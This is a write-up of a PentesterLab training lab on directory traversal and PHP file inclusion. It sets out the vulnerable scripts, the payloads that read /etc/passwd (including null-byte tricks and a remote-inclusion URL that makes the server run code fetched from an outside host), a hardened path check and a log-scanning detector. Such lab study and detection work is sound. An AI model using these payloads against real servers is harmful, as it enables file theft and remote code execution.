We continue with the 'Web For Pentester' lab from PentesterLab, this time with the blocks of exercises on 'directory traversal' and 'file inclusion' vulnerabilities. Both let an attacker read, and in some cases execute, files outside the web server's document root (locally and, occasionally, remotely) by supplying a relative path ("../") or an absolute one, usually because the input coming from the client is not validated correctly.
DIRECTORY TRAVERSAL
As we said, exploiting these vulnerabilities gives access to files that should not be accessible.
In each of these directory (or path) traversal exercises you will not get the link directly but only some small images/icons, so first read the page source (or right-click and "Copy Image Location") to obtain the URL the image is served from.
Exercise 1
The first link is http://pentesterlab/dirtrav/example1.php?file=hacker.png and if you open it in the browser you will see the raw bytes of the file as text instead of the image, because the script never sends a Content-Type header (see the code below).
SERVER
<?php
$UploadDir = '/var/www/files/';
if (!(isset($_GET['file'])))
    die();
$file = $_GET['file'];
$path = $UploadDir . $file;   // user input concatenated without any filtering
if (!is_file($path))          // only checks that the result is an existing regular file
    die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));
$handle = fopen($path, 'rb');
do {
    $data = fread($handle, 8192);
    if (strlen($data) == 0) {
        break;
    }
    echo($data);
} while (true);
fclose($handle);
exit();
?>
As you can see in the server code, $file = $_GET['file'] is concatenated to $UploadDir without any filtering, and is_file() only verifies that the result is an existing regular file. Exploiting it is therefore trivial: add "../" enough times to climb from /var/www/files/ to the root (three are enough; extra ones are harmless because ".." at / stays at /) and then give the path of a common or predictable file. Bear in mind that you read files with the permissions of the user running the web server, so you will not normally be able to read files such as /etc/shadow.
PAYLOAD:
http://pentesterlab/dirtrav/example1.php?file=../../../../../../../../etc/passwd
In this case the browser shows the content directly, but often we will be forced to download the file (when the server sends a Content-Disposition: attachment header) and open it afterwards to see its contents. To avoid that tedium, especially when retrieving many files, we can use a command-line tool such as wget (or curl) and write the response to standard output:
wget -O - 'http://pentesterlab/dirtrav/example1.php?file=../../../../../../../../etc/passwd'
Exercise 2
In the next exercise you will see that the image link contains its full path: http://pentesterlab/dirtrav/example2.php?file=/var/www/files/hacker.png.
If you check the code you will see that the request is only required to contain the string "/var/www/files/" somewhere: strstr() is a substring test, it neither resolves the path nor checks that the file really lives under that directory:
<?php
if (!(isset($_GET['file'])))
    die();
$file = $_GET['file'];
if (!(strstr($file,"/var/www/files/")))   // substring test only: "/var/www/files/../" still passes
    die();
if (!is_file($file))
    die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($file) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($file));
$handle = fopen($file, 'rb');
do {
    $data = fread($handle, 8192);
    if (strlen($data) == 0) {
        break;
    }
    echo($data);
} while (true);
fclose($handle);
exit();
?>
so we can read the same passwd file simply by putting the image directory at the beginning of the payload and then climbing out of it with "../" (three are enough to get from /var/www/files/ to /; any extra ".." at / is ignored):
PAYLOAD
http://pentesterlab/dirtrav/example2.php?file=/var/www/files/../../../../etc/passwd
Exercise 3
In the last exercise the server also appends the .png extension to whatever we supply, so in principle only files ending in .png are reachable:
SERVER
<?php
$UploadDir = '/var/www/files/';
if (!(isset($_GET['file'])))
    die();
$file = $_GET['file'];
$path = $UploadDir . $file.".png";   // extension forced by the server
// Simulate null-byte issue that used to be in filesystem related functions in PHP
$path = preg_replace('/\x00.*/',"",$path);
if (!is_file($path))
    die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));
$handle = fopen($path, 'rb');
do {
    $data = fread($handle, 8192);
    if (strlen($data) == 0) {
        break;
    }
    echo($data);
} while (true);
fclose($handle);
exit();
?>
Here we rely on an old null-byte issue. In PHP before 5.3.4 (and historically in Perl as well) a string containing an encoded NUL byte (%00) was passed straight to the underlying C filesystem functions, which treat NUL as the end of the string, so everything after it, in this case the ".png" the script appends, was silently dropped. That lets us reach files that do not end in .png.
In the exercise the behaviour is simulated with the preg_replace() call, which removes the NUL byte and everything after it before is_file() runs. As in example 1 the script prefixes $UploadDir itself, so there is no need to supply the full path; we only need to add the null byte right after our target file, without any extension, because the script adds ".png" after it. The NUL byte must be sent single-encoded as %00: %2500 decodes to the literal three characters "%00", which the regular expression does not match.
PAYLOAD
http://pentesterlab/dirtrav/example3.php?file=../../../../etc/passwd%00
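To see exactly which file each of the three scripts ends up opening, and why the fix has to normalise the path before checking it, here is an added Python model of their checks. It is example code written for this post, not PentesterLab's code: it reproduces the string handling of example1.php, example2.php and example3.php (the $UploadDir prefix, the strstr() substring test, the appended ".png" and the simulated NUL truncation) and adds a hardened_path() check of the kind the scripts are missing. posixpath.normpath stands in for the kernel's resolution of "..", decode_query_value() for PHP's single decoding of $_GET, and the payloads fed to it are the ones used above.

```python
import posixpath
import re
from urllib.parse import unquote_plus

# Added model of the three dirtrav scripts discussed above (not PentesterLab's code).
# Each example*_path() returns the string the PHP script would hand to is_file()/fopen(),
# or None where the script's own check would call die().
UPLOAD_DIR = "/var/www/files/"


def decode_query_value(raw: str) -> str:
    """PHP decodes a query parameter exactly once when it builds $_GET."""
    return unquote_plus(raw)


def strip_after_nul(path: str) -> str:
    """What example3.php simulates with preg_replace('/\\x00.*/', '', $path):
    the NUL byte and everything after it on the same line is dropped, as the
    C filesystem functions behind PHP < 5.3.4 effectively did."""
    return re.sub(r"\x00.*", "", path)


def example1_path(file_param: str) -> str:
    # $path = $UploadDir . $file;  -- plain concatenation, no check at all
    return UPLOAD_DIR + file_param


def example2_path(file_param: str):
    # strstr($file, "/var/www/files/") only requires the substring to appear somewhere
    if "/var/www/files/" not in file_param:
        return None
    return file_param


def example3_path(file_param: str) -> str:
    # $path = $UploadDir . $file . ".png", then the simulated NUL truncation
    return strip_after_nul(UPLOAD_DIR + file_param + ".png")


def resolved(path):
    """The file the kernel actually opens once '..' components are collapsed.
    posixpath.normpath stands in for realpath(); it does not follow symlinks."""
    return None if path is None else posixpath.normpath(path)


def hardened_path(file_param: str):
    """The missing check: refuse NUL bytes, normalise the concatenated path and
    require it to stay inside UPLOAD_DIR (realpath() plus a prefix test in PHP)."""
    if "\x00" in file_param:
        return None
    base = posixpath.normpath(UPLOAD_DIR)
    candidate = posixpath.normpath(UPLOAD_DIR + file_param)
    if not candidate.startswith(base + "/"):
        return None
    return candidate


if __name__ == "__main__":
    print(resolved(example1_path("../../../../../../../../etc/passwd")))
    print(resolved(example2_path("/var/www/files/../../../../etc/passwd")))
    print(resolved(example3_path(decode_query_value("../../../../etc/passwd%00"))))
    print(resolved(example3_path(decode_query_value("../../../../etc/passwd%2500"))))
    print(hardened_path("hacker.png"), hardened_path("../../../../etc/passwd"))
```

Run it and the three exploit payloads all resolve to /etc/passwd while hardened_path() rejects each of them. Two details are worth noticing: ../../../../etc/passwd.png%00 against example3.php resolves to /etc/passwd.png, not /etc/passwd, because the truncation happens after the script's own ".png" is appended; and the double-encoded %2500 survives as the text "%00", is never truncated, and therefore fails the is_file() check. In real PHP code use realpath(), which also follows symlinks and returns false for a missing file, rather than plain string normalisation.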
FILE INCLUDE
The next type of vulnerability comes from poor control over the argument passed to functions such as require, require_once, include or include_once in PHP, which developers use to load code that is reused across several pages of the web application. If the attacker controls which file is included, they can:
- read any local file in the filesystem (path traversal)
- read and, if it contains code the server interprets, execute any local file (local file inclusion or LFI)
- read and, if it contains code the server interprets, execute a file fetched from a remote host (remote file inclusion or RFI); in PHP this additionally requires allow_url_include to be enabled, which it is not by default.
Exercise 1
In the first exercise we get the following error when we inject any unexpected character, e.g. a single quote:
As you can see, the message reveals the full path of the script (/var/www/fileincl/example1.php), the function used (include()) and the value it expects, the file intro.php. And if you look at the server code you will see that the proof of concept could not be simpler:
SERVER
<?php
if ($_GET["page"]) {
    include($_GET["page"]);
}
?>
Since there is no filter of any kind, we can inject without restriction:
PAYLOAD 1 (path or dir traversal)
http://pentesterlab/fileincl/example1.php?page=../../../../../etc/passwd
For the RFI proof of concept it is enough to find a text file reachable from the Internet that contains a simple call to phpinfo(). Because it is served as .txt the host that stores it does not execute it; it is the vulnerable server that fetches it and runs it as PHP (only possible when allow_url_include is enabled, as it is in the lab):
Code
<?php
phpinfo();
?>
E.g. http://www.spenneberg.org/phpinfo.txt
PAYLOAD 2 (RFI)
http://pentesterlab/fileincl/example1.php?page=http://www.spenneberg.org/phpinfo.txt
Exercise 2
The second exercise is similar to what we saw in the directory traversal exercises: the script appends ".php" to our input and simulates the null-byte truncation that, as we recalled, was fixed in PHP 5.3.4.
SERVER
<?php
if ($_GET["page"]) {
    $file = $_GET["page"].".php";   // extension forced by the server
    // simulate null byte issue
    $file = preg_replace('/\x00.*/',"",$file);
    include($file);
}
?>
PAYLOAD 1 (path or dir traversal)
http://pentesterlab/fileincl/example2.php?page=../../../../../etc/passwd%00
PAYLOAD 2 (RFI)
http://pentesterlab/fileincl/example2.php?page=http://www.spenneberg.org/phpinfo.txt%00
In both cases the single-encoded %00 is what stops the appended ".php" from reaching include(); without it the server would look for passwd.php locally or request phpinfo.txt.php from the remote host.
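From the defender's side, all of the requests above leave recognisable traces in the web server's access log: "../" sequences (plain or percent-encoded), a %00 inside a parameter, a full URL passed as a parameter value, or a reference to /etc/passwd. As an added example, not taken from the course or from the original post, the following Python script scans a handful of constructed Apache combined-format log lines (the client addresses, timestamps, sizes and user agents are made up; the request targets are the payloads from this post) and reports which parameter of which request looks like a traversal, null-byte or remote-inclusion attempt.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-format lines: made-up clients, times, sizes and
# user agents; the request targets are the payloads discussed in this post.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2014:10:01:02 +0000] "GET /dirtrav/example1.php?file=hacker.png HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2014:10:01:09 +0000] "GET /dirtrav/example1.php?file=../../../../../../../../etc/passwd HTTP/1.1" 200 1244 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2014:10:02:11 +0000] "GET /dirtrav/example2.php?file=/var/www/files/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1244 "-" "Wget/1.15"
10.0.0.5 - - [12/Mar/2014:10:03:40 +0000] "GET /dirtrav/example3.php?file=../../../../etc/passwd%00 HTTP/1.1" 200 1244 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2014:10:04:05 +0000] "GET /fileincl/example1.php?page=http://www.spenneberg.org/phpinfo.txt HTTP/1.1" 200 65211 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2014:10:05:00 +0000] "GET /fileincl/example1.php?page=intro.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# client ident user [time] "METHOD target PROTOCOL" status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")   # a '..' path component
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
SENSITIVE_MARKERS = ("etc/passwd", "etc/shadow")


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so that %2e%2e, %00 and the
    double-encoded %2500 all end up as the characters the sender intended."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_param(value: str) -> list:
    """Return the suspicious traits of one parameter value, in a fixed order."""
    v = decode_fully(value)
    findings = []
    if "\x00" in v:
        findings.append("null-byte")
    if TRAVERSAL_RE.search(v):
        findings.append("traversal")
    if REMOTE_RE.match(v):
        findings.append("remote-include")
    if any(marker in v.lower() for marker in SENSITIVE_MARKERS):
        findings.append("sensitive-path")
    return findings


def scan_log(text: str) -> list:
    """Parse each request line, split its query string and report every
    parameter that shows at least one suspicious trait."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl decodes once, exactly like PHP does when building $_GET
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            findings = classify_param(value)
            if findings:
                hits.append({"ip": m.group("ip"), "path": parts.path,
                             "param": name, "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["path"]} {hit["param"]}: {", ".join(hit["findings"])}')
```

The two benign requests (hacker.png and intro.php) produce no hit; the four attack lines are each reported with the traits that apply to them. Decoding more than once is a detection choice, not a statement about the application: PHP decodes $_GET only once, so a %2500 payload would not actually exploit these scripts, but it is a cheap way to catch probing. Note also that Apache records the request line as received, so a NUL byte shows up in the log as the text %00 and is only turned into a real NUL by the decoding here.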
Tags:
Injection